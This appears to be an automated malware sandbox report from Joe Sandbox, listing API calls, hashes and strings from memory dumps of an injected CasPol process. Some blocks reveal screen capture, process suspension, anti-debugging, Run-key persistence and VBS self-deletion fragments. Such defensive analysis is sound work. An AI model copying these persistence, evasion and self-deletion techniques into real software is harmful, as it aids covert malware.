                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 806657224-0
                                                                                                                  • Opcode ID: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
                                                                                                                  • Instruction ID: 7f7bbd1fe339d2c51afc51fb5ca91abc0e6e8a710e1dc4bf18eddf40c0258009
                                                                                                                  • Opcode Fuzzy Hash: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
                                                                                                                  • Instruction Fuzzy Hash: B231BA70904205DFEB159F69CC8287EBBB8FF0576072541AFE054AB2B1DB348D46DB58
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                    • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                    • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                    • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                    • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                                                                                    • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450ECE
                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F1F
                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FDF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2829624132-0
                                                                                                                  • Opcode ID: 0004d795c3ddcb7d717e2e5c50f1122ee861edcca01c339632c8702d630a2b0e
                                                                                                                  • Instruction ID: f4db154689a757c669ee29d9ad80dc5f2d25de97e2fa36f56d0a3b4566e2e889
                                                                                                                  • Opcode Fuzzy Hash: 0004d795c3ddcb7d717e2e5c50f1122ee861edcca01c339632c8702d630a2b0e
                                                                                                                  • Instruction Fuzzy Hash: 5261B3359002079BEB289F24CC82B7A77A8EF04706F1041BBED05C6696E77CD989DB58
                                                                                                                  APIs
                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0043A765
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0043A76F
                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0043A77C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3906539128-0
                                                                                                                  • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                                  • Instruction ID: 91e5dab5071ea2c3d468f992cf6309450941867bc48944ec1b7f80ed58ec6f75
                                                                                                                  • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                                  • Instruction Fuzzy Hash: 4A31D27494132CABCB21DF24D98979DBBB8AF08310F5051EAE80CA7261E7349F81CF49
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,0044253A,?), ref: 00442585
                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,0044253A,?), ref: 0044258C
                                                                                                                  • ExitProcess.KERNEL32 ref: 0044259E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1703294689-0
                                                                                                                  • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                  • Instruction ID: c44577b837509f0b32c3b0b508549cfe19acceb0599f6adc3fd698849a85d96e
                                                                                                                  • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                  • Instruction Fuzzy Hash: 68E08C31004208BFEF016F10EE19A8D3F29EF14382F448475F8098A232CB79DD82CB88
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                                                  • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1703294689-0
                                                                                                                  • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                  • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                                                  • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                  • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                                                  APIs
                                                                                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150C3,00000000), ref: 0041ACDC
                                                                                                                  • NtSuspendProcess.NTDLL(00000000), ref: 0041ACE9
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,004150C3,00000000), ref: 0041ACF2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CloseHandleOpenSuspend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1999457699-0
                                                                                                                  • Opcode ID: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                                                  • Instruction ID: 2f9544719979d624048292b5ab27ab43be47c8216fe5e38c5e6db7c07fdef43b
                                                                                                                  • Opcode Fuzzy Hash: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                                                  • Instruction Fuzzy Hash: 36D0A733505132638221176A7C0CC87EE6CDFC1EB37024136F805C3220DE30C88186F4
                                                                                                                  APIs
                                                                                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150E8,00000000), ref: 0041AD08
                                                                                                                  • NtResumeProcess.NTDLL(00000000), ref: 0041AD15
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,004150E8,00000000), ref: 0041AD1E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CloseHandleOpenResume
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3614150671-0
                                                                                                                  • Opcode ID: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                                                  • Instruction ID: 37c2ac379339410306f7c92c5038f8fbeac8a1766455cc2515cdfea107740f35
                                                                                                                  • Opcode Fuzzy Hash: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                                                  • Instruction Fuzzy Hash: 3AD05E32504121638220176A7C0C887EEA9DBC5AB37024236F804C26219A24C841C6A4
                                                                                                                  APIs
                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475FA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoLocale
                                                                                                                  • String ID: GetLocaleInfoEx
                                                                                                                  • API String ID: 2299586839-2904428671
                                                                                                                  • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                  • Instruction ID: 2e67eb2aa2785e7236de0a8104ca96919387e7076f6eaa21777fcb5c897bf932
                                                                                                                  • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                  • Instruction Fuzzy Hash: F8F0F031A44308BBDB11AF61DC06F6E7B25EF04722F10016AFC042A292CF399E11969E
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                    • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                    • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                    • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                    • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                                                                                    • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045111E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1663032902-0
                                                                                                                  • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                  • Instruction ID: ffb89f5268d48ef7d96d62573a9e7ee2f0935f0833e1875b56c64ac51f5bdf94
                                                                                                                  • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                  • Instruction Fuzzy Hash: BB21B332500606ABEB249E25DC42B7B73A8EF49316F1041BBFE01D6252EB7C9D49C759
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                    • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                    • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                    • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                  • EnumSystemLocalesW.KERNEL32(00450E7A,00000001), ref: 00450DC4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1084509184-0
                                                                                                                  • Opcode ID: 7b25a473866e755be9e0678553a2658a3eea11fb5f40ef7cfa4196b50ecc0277
                                                                                                                  • Instruction ID: a560303710cbb7e2025c6fde9de160b8e713eede11b464f6c41b4ad7cf2026db
                                                                                                                  • Opcode Fuzzy Hash: 7b25a473866e755be9e0678553a2658a3eea11fb5f40ef7cfa4196b50ecc0277
                                                                                                                  • Instruction Fuzzy Hash: 0311063A2003055FDB189F79C8916BAB7A2FF8035AB14442DE94647741D375B846C744
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                    • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                    • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                    • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451098,00000000,00000000,?), ref: 00451326
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2692324296-0
                                                                                                                  • Opcode ID: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                                                                  • Instruction ID: 4a7b2d8eee9e9bf1806ba2ca5426cfe5ee0bfa5d6ba01d855eb6d5500f899482
                                                                                                                  • Opcode Fuzzy Hash: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                                                                  • Instruction Fuzzy Hash: F8F07D32900211BBEF245B25CC16BFB7758EF40316F14046BEC05A3651EA78FD45C6D8
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                    • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                    • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                    • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                  • EnumSystemLocalesW.KERNEL32(004510CA,00000001), ref: 00450E39
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00444ADC: EnterCriticalSection.KERNEL32(?,?,0044226B,00000000,0046DAC0,0000000C,00442226,?,?,?,00448749,?,?,00446F84,00000001,00000364), ref: 00444AEB
                                                                                                                  • EnumSystemLocalesW.KERNEL32(Function_00047078,00000001,0046DC48,0000000C), ref: 004470F6
                                                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                    • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                    • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                    • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                  • EnumSystemLocalesW.KERNEL32(00450C5E,00000001), ref: 00450D3E
                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                  APIs
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00033CF3,004339C1), ref: 00433CEC
                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                  APIs
                                                                                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FC9
                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00417FD4
                                                                                                                    • Part of subcall function 00418462: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418492
                                                                                                                  • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418055
                                                                                                                  • DeleteDC.GDI32(?), ref: 0041806D
                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00418070
                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041807B
                                                                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 004180A3
                                                                                                                  • GetCursorInfo.USER32(?), ref: 004180C5
                                                                                                                  • GetIconInfo.USER32(?,?), ref: 004180DB
                                                                                                                  • DeleteObject.GDI32(?), ref: 0041810A
                                                                                                                  • DeleteObject.GDI32(?), ref: 00418117
                                                                                                                  • DrawIcon.USER32(00000000,?,?,?), ref: 00418124
                                                                                                                  • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418154
                                                                                                                  • GetObjectA.GDI32(?,00000018,?), ref: 00418183
                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181CC
                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181EF
                                                                                                                  • GlobalAlloc.KERNEL32(00000000,?), ref: 00418258
                                                                                                                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041827B
                                                                                                                  • DeleteDC.GDI32(?), ref: 0041828F
                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00418292
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00418295
                                                                                                                  • GlobalFree.KERNEL32(00CC0020), ref: 004182A0
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00418354
                                                                                                                  • GlobalFree.KERNEL32(?), ref: 0041835B
                                                                                                                  • DeleteDC.GDI32(?), ref: 0041836B
                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00418376
                                                                                                                  • DeleteDC.GDI32(?), ref: 004183A8
                                                                                                                  • DeleteDC.GDI32(00000000), ref: 004183AB
                                                                                                                  • DeleteObject.GDI32(?), ref: 004183B1
                                                                                                                  • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
                                                                                                                  • String ID: DISPLAY
                                                                                                                  APIs
                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                                                  • ExitProcess.KERNEL32 ref: 0041151D
                                                                                                                    • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                    • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                    • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                    • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                                                  • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                                                    • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                    • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                    • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                  • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                                                  • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                                                    • Part of subcall function 0041B59F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5FB
                                                                                                                    • Part of subcall function 0041B59F: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B60F
                                                                                                                    • Part of subcall function 0041B59F: CloseHandle.KERNEL32(00000000), ref: 0041B61C
                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                                                  • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                                                  • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                                                    • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                                                                                                                  • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                                  • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                    • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                                                    • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                    • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                    • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                    • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                                                  • ExitProcess.KERNEL32 ref: 0040C287
                                                                                                                  • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                  • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                                  • API String ID: 3797177996-1998216422
